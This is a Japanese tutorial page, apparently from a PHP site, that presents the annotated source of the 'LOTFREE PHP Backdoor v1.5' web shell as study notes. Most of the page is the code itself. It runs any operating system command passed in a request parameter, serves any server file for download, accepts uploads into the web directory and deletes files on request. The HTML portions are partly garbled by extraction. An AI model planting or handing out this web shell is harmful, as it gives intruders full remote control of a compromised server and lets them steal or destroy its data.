PHPバックドアファイルの説明

WBOY
リリース: 2016-07-25 09:13:33
オリジナル
1975 人が閲覧しました

PHP バックドア バージョン 1.5 は、sirius_black / LOTFREE TEAM によって書かれた PHP バックドア プログラムです。これは、PHP を学習するためのメモとしても使用できます。 Web サーバーのインストール 管理者であれば、PHP を使用するときにユーザーの権限があれば、さまざまなオペレーティング システム コマンドを実行できます。

以下はバックドアに関するメモです


  1. function good_link($link)
  2. {
  3. $link= ereg_replace (“/+”,”/”,$link);
  4. $link=ereg_replace(“/[^/(..)]+/..”,”/”,$link);
  5. $link = ereg_replace("/+","/",$link);
  6. if(!strncmp($link,"./",2) && strlen($link)>2)$link=substr($link , 2);
  7. if($link==”")$link=”.”;
  8. return $link;
  9. }
  10. //$_REQUESTは、このファイルに送信されたデータを取得するために使用されます
  11. $ dir= isset($_REQUEST['dir'])?$_REQUEST['dir']:"."; // dir が定義されていない場合、dir はデフォルト値 "." を受け取ります
  12. $dir=good_link($dir );
  13. $rep=opendir($dir); // dir
  14. chdir($dir); で指定されたパスハンドルを開く // dir
  15. if(isset($_REQUEST["down "]) &&$_REQUEST ["down"]!="") //down が定義されている場合
  16. {
  17. header("Content-Type: application/octet-stream");
  18. header("Content-Length : ".filesize($ _REQUEST["down"]));
  19. header("Content-Disposition:attachment; filename=".basename($_REQUEST["down"]));
  20. readfile($_REQUEST[" down"]); / /ファイルをバッファに読み込みます
  21. exit();
  22. }
  23. ?>

  24. LOTFREE PHP バックドア v1.5, yeetrack.com



  25. echo "現在の絶対パスは: ".getcwd()。 "< /b>gt;
    n"; //現在の絶対パスを取得します
  26. echo "dir = '$dir'
    n";
  27. echo "カレントディレクトリ、ファイルリスト!

    n”;
  28. //実行するコマンドを入力した場合
  29. if(isset($_REQUEST['cmd']) &&$_REQUEST['cmd ']!=” ")
  30. {
  31. echo "
    n";
  32. system($_REQUEST['cmd']); //入力したコマンドをサーバー上で実行すると、実行結果は以下のようになりますechoed
  33. echo "n";
  34. }
  35. //ファイルがアップロードされている場合
  36. if(isset($_FILES["fic"]["name"]) && isset($_POST ["MAX_FILE_SIZE"])) // 投稿されたファイルを取得し、現在のディレクトリに保存します
  37. {
  38. if($_FILES["fic"]["size"]<$_POST["MAX_FILE_SIZE"]) / /ファイルがサイズ指定を満たしているか判断します
  39. {
  40. if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FILES["fic"]["name"] ))) //一時ファイルを現在のディレクトリに保存します
  41. {
  42. echo "ファイルは正常に保存されました".good_link("./".$_FILES["fic"]["name"])."!< br>n";
  43. }
  44. else echo "ファイルのアップロードに失敗しました: ".$_FILES["fic"]["error"]."
    n";
  45. }
  46. else echo "ファイルも大きい (ファイルがサイズ制限を超えています)!
    n ";
  47. }
  48. if(isset($_REQUEST['rm']) &&$_REQUEST['rm']!="") //rm の場合定義されている場合は、指定されたファイルを削除します
  49. {
  50. if (unlink($_REQUEST['rm'])) //unlinkはphp
  51. echoのファイル削除関数です "削除に成功しました ".$_REQUEST['rm']。 "!
    n";
  52. else echo "ファイルの削除に失敗しました
    n";
  53. }
  54. ?>



  55. $t_dir=array();
  56. $t_file=array();
  57. $i_dir= 0;
  58. $i_file=0;
  59. // 読み取り前にディレクトリファイルをループし、t_dir と t_file に配置します
  60. while($x=readdir($rep))
  61. {
  62. if(is_dir($) x)) // 現在処理中の場合
  63. $t_dir[$i_dir++]=$x;
  64. else // 現在処理中のファイルの場合
  65. $t_file[$i_file++]=$x;
  66. }
  67. closedir($rep); //opendir で閉じます
  68. while(1) //現在のパス内のディレクトリとファイルをループします
  69. {
  70. ?>




  71. if(!$x && !$y)
  72. break;
  73. }
  74. ?>

  75. if($x=each($t_dir))
  76. {
  77. $name =$x["value"]; // t_dir 配列内のディレクトリ名を取得します
  78. if($name=='.'){ }
  79. elseif($name=='..') echo " UP (親ディレクトリ)

    n"; //UPリンクを表示し、親ディレクトリのファイルリストを読み込む
  80. else
  81. echo " ".$name."n";
  82. }
  83. ?>
  84. //$_SERVER['PHP_SELF'] 現在のPHPスクリプトファイル名を取得します
  85. if( $y =each($t_file))
  86. {
  87. if($y["key"]%2==0) //現在の処理が key
  88. echo の場合 ” bgcolor='lightgreen'>n” ;
  89. else //現在の処理が値、つまりファイルの場合。ファイルが表示され、ダウンロード リンクが提供されます。
  90. echo “>n”;
  91. echo “ ".$y["value"]."n";
  92. }
  93. else echo ">n";
  94. ?>
  95. if($y)
  96. {
  97. //ファイルの場合、ファイルを削除するには次のリンクを提供してください
  98. if($y [" key"]%2==0)echo ” bgcolor='lightgreen'";
  99. echo ">Del";
  100. }
  101. else echo ">n";
  102. ?>
  103. < ;/ td>





  104. ?dir=”>レヴニラウレパートリー< ;br> ;


  105. ”>
  106. 実行commande(オペレーティング システム コマンドを実行)
  107. ファイルをサーバーの現在のディレクトリにアップロードします:

  108. ”>




コードをコピー





関連ラベル:
ソース:php.cn
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
最新の問題
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート